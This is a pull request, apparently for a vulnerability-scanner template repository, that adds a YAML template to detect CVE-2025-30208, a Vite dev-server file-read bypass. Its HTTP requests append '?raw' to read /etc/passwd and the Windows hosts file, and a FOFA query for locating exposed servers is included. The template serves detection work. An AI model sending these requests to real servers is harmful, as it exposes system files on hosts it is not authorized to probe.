### PR TITLE
Added  CVE-2025-30208 Template

### DIFF
--- a/http/cves/2025/CVE-2025-30208.yaml
+++ b/http/cves/2025/CVE-2025-30208.yaml
@@ -1,0 +1,48 @@
+id: CVE-2025-30208
+
+info:
+  name: Vite Arbitrary File Read
+  author: v2htw
+  severity: medium
+  tags: cve,cve2025,arbitrary-file-read,vite,CVE-2025-30208
+  description: |
+    Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
+  reference:
+    - https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-30208
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2025-30208
+    cwe-id: CWE-284
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: 'body="/@vite/client"'
+http:
+  - method: GET
+    path: 
+          - "{{BaseURL}}/etc/passwd?raw"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "root:x:0:0"
+        part: body
+      - type: status
+        status:
+          - 200
+
+  - method: GET
+    path: 
+          - "{{BaseURL}}/C:/Windows/System32/drivers/etc/hosts?raw"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Microsoft Corp"
+      - type: status
+        status:
+          - 200
+

--- a/http/cves/2025/CVE-2025-30208.yaml
+++ b/http/cves/2025/CVE-2025-30208.yaml
@@ -24,7 +24,7 @@ flow: http(1) && http(2)
 
 http:
   - method: GET
-    path: 
+    path:
       - "{{BaseURL}}"
 
     matchers:
@@ -35,7 +35,7 @@ http:
         internal: true
 
   - method: GET
-    path: 
+    path:
       - "{{BaseURL}}/etc/passwd?raw"
       - "{{BaseURL}}/C:/Windows/System32/drivers/etc/hosts?raw"
 

--- a/http/cves/2025/CVE-2025-30208.yaml
+++ b/http/cves/2025/CVE-2025-30208.yaml
@@ -1,10 +1,9 @@
 id: CVE-2025-30208
 
 info:
-  name: Vite Arbitrary File Read
+  name: Vite - Arbitrary File Read
   author: v2htw
   severity: medium
-  tags: cve,cve2025,arbitrary-file-read,vite,CVE-2025-30208
   description: |
     Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
   reference:
@@ -19,30 +18,36 @@ info:
     verified: true
     max-request: 1
     fofa-query: 'body="/@vite/client"'
+  tags: cve,cve2025,arbitrary-file-read,vite,CVE-2025-30208
+
+flow: http(1) && http(2)
+
 http:
   - method: GET
     path: 
-          - "{{BaseURL}}/etc/passwd?raw"
-    matchers-condition: and
+      - "{{BaseURL}}"
+
     matchers:
       - type: word
-        words:
-          - "root:x:0:0"
         part: body
-      - type: status
-        status:
-          - 200
+        words:
+          - "vite"
+        internal: true
 
   - method: GET
     path: 
-          - "{{BaseURL}}/C:/Windows/System32/drivers/etc/hosts?raw"
+      - "{{BaseURL}}/etc/passwd?raw"
+      - "{{BaseURL}}/C:/Windows/System32/drivers/etc/hosts?raw"
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
           - "Microsoft Corp"
+        condition: or
+
       - type: status
         status:
           - 200
-


### PR DESCRIPTION
### Template / PR Information


- Added CVE-2025-30208
- References:
    https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w
    https://nvd.nist.gov/vuln/detail/CVE-2025-30208
### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
![image](https://github.com/user-attachments/assets/2d046ce7-5f7d-450e-8803-4e480ef877c8)
![image](https://github.com/user-attachments/assets/5233d318-6aa6-4558-b133-d1ff8570fb60)
![image](https://github.com/user-attachments/assets/81f5f0b2-c942-4aa3-9544-3069b53bc3a2)
![image](https://github.com/user-attachments/assets/a1d108f4-3d49-4553-ab6d-3c04ed81c0aa)

<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->
